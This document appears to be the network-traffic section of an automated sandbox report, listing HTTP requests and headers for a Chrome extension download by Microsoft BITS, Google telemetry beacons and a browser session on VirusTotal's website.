                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 81885
                                                                                                                                                                      x-request-id: 38998816-cfb7-4843-b418-a23ffd4d1da4
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44526
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 129470-211354/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=211355-519078
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 307724
                                                                                                                                                                      x-request-id: 1e57a1db-466a-4784-b521-3c86ba3bc406
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44527
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 211355-519078/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=519079-863642
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons.gcp.gvt2.com
                                                                                                                                                                      content-length: 4860
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons.gcp.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://e2c19.gcp.gvt2.com/nel/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.65.65.90:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /nel/ HTTP/2.0
                                                                                                                                                                      host: e2c19.gcp.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 204
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:50:12 GMT
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.35:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://e2cs09.gcp.gvt2.com/nel/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.101.85.36:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /nel/ HTTP/2.0
                                                                                                                                                                      host: e2cs09.gcp.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 204
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:50:14 GMT
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://virustotal.com/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.239.34.21:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET / HTTP/1.1
                                                                                                                                                                      Host: virustotal.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 302 Found
                                                                                                                                                                      Location: https://virustotal.com/
                                                                                                                                                                      X-Cloud-Trace-Context: 96bb483791e2adb01265df5283d06dd0
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:50:14 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Google Frontend
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons2.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      172.217.169.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons2.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://virustotal.com/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.239.34.21:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET / HTTP/2.0
                                                                                                                                                                      host: virustotal.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/ HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/static/fonts/iosevka-regular.woff2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/static/fonts/iosevka-regular.woff2 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/static/fonts/googlesans-regular.ttf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/static/fonts/googlesans-regular.ttf HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/main.46e78b391f917115852c.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/main.46e78b391f917115852c.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/images/logo.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/images/logo.svg HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/images/omnibar/vt_logo.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/images/omnibar/vt_logo.svg HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://www.virustotal.com/ui/signin
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /ui/signin HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      content-length: 4
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTQzNTczMzA2MjEtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjE0LjkxOQ==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/stackdriver-errors.239a9bb4d545f6f3f8ee.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/stackdriver-errors.239a9bb4d545f6f3f8ee.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3789.1cda18a27da511a6130f.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3789.1cda18a27da511a6130f.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/9262.42622b96b2a29faebecd.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/9262.42622b96b2a29faebecd.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/3494.4fe91483bcd041f676d8.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/3494.4fe91483bcd041f676d8.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/vt-ui-shell-extra-deps.622a81b0530a0b62d881.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/vt-ui-shell-extra-deps.622a81b0530a0b62d881.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/vt-ui-sw-installer.e0eb1a1e08d6512ba355.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/vt-ui-sw-installer.e0eb1a1e08d6512ba355.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/static/qrcode.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/static/qrcode.min.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/static/opensearch.xml
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/static/opensearch.xml HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/images/favicon.png
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/images/favicon.png HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/service-worker.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/service-worker.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      cache-control: max-age=0
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      service-worker: script
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: same-origin
                                                                                                                                                                      sec-fetch-dest: serviceworker
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/images/manifest/icon-192x192.png
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/images/manifest/icon-192x192.png HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/sha256.worker.a6e2f1b9e97a4ea0b474.worker.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
